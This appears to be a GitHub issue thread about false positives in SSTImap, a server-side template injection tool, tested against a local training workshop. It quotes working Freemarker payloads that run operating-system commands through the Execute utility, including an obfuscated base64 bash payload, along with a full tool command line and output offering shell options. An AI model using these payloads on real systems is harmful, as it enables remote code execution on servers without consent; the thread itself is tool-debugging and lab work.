SSTImap should test simple payload, otherwise may return false positive result

[alasalamont]

Hi brother, I did test SSTImap on this workshop, at 25_template_freemarker

https://gosecure.github.io/template-injection-workshop/

When I use simple payload, it works

<#assign ex="freemarker.template.utility.Execute"?new()>${ ex("id")}

But when the tool use its payload, it does not work

${7670795914?c}<#assign ex="freemarker.template.utility.Execute"?new()>${ ex("bash -c {eval,$({tr,/+,_-}<<<ZWNobyBhMA==|{base64,--decode})}") }${7841412055?c}

The site returns

Template blocked: Cannot run program "bash": error=2, No such file or directory ---- FTL stack trace ("~" means nesting-related): - Failed at: ${ex("bash -c {eval,$({tr,/+,_-}\l\l\... [in template "tpl" at line 1, column 72] ----

Because of this, the tool also return false positive result

┌──(root㉿kali)-[/home/kali/Desktop/SSTImap]
└─# python3 sstimap.py -u "http://localhost:8025/admin/edit_page/1" -d "_csrf=ddcf50d0-b5a0-43f5-95dd-351495abc31b&title=Welcome+Page&templateCode=*&action=test" -C "JSESSIONID=182F5156C0D7E1B0A0E72D87D3D4F845" --proxy http://localhost:8080 -l 5 -e Freemarker

[*] Version: 1.1.4
[*] Author: @vladko312
[*] Based on Tplmap
[!] LEGAL DISCLAIMER: Usage of SSTImap for attacking targets without prior mutual consent is illegal.
It is the end user's responsibility to obey all applicable local, state and federal laws.
Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] Loaded plugins by categories: languages: 5; legacy_engines: 1; engines: 16

[*] Scanning url: http://localhost:8025/admin/edit_page/1
[*] Testing if POST parameter 'templateCode' is injectable
[*] Freemarker plugin is testing rendering with tag '*'
[+] Freemarker plugin has confirmed injection with tag '*'
[+] SSTImap identified the following injection point:

  POST parameter: templateCode
  Engine: Freemarker
  Injection: *
  Context: text
  OS: undetected
  Technique: render
  Capabilities:

    Shell command execution: no
    Bind and reverse shell: no
    File write: no
    File read: no
    Code evaluation: no

[+] Rerun SSTImap providing one of the following options:
    --tpl-shell                  Prompt for an interactive shell on the template engine.
    --tpl-cmd                    Inject code in the template engine.

[mrdragonblack]

same problem but the problem is the web not use template engine or maybe is just junk http packet maybe because error from web like 5xx or waf can cause false positive or the target web not vuln with ssti just junk http

[vladko312]

@alasalamont Why is your case false positive? SSTImap correctly identified the template injection as rendered Freemarker using another payload. It was unable to run OS commands, as it tried using bash, but you still can inject template code to try different payloads. This works as intended, as bypassing waf is hard to automate.

I will work on improving the payload system though, as bash is not always present on the target.

[vladko312]

@mrdragonblack the problem you described is most likely caused by blind detection with small delay. Increase the delay or disable blind detection

[alasalamont]

@alasalamont Why is your case false positive? SSTImap correctly identified the template injection as rendered Freemarker using another payload. It was unable to run OS commands, as it tried using bash, but you still can inject template code to try different payloads. This works as intended, as bypassing waf is hard to automate.

I will work on improving the payload system though, as bash is not always present on the target.

Yup you are correct. I suggest add more some payload to test to double-check. Like in this case, the sysetm has no bash ^^

[vladko312]

I suggest add more some payload to test to double-check. Like in this case, the sysetm has no bash

I will do something about that, making more payload variations once the language is detected.

[vladko312]

Blind false positives should be fixed in 1.2.0 @mrdragonblack, can you verify?

As for payloads with bash - this will come in later versions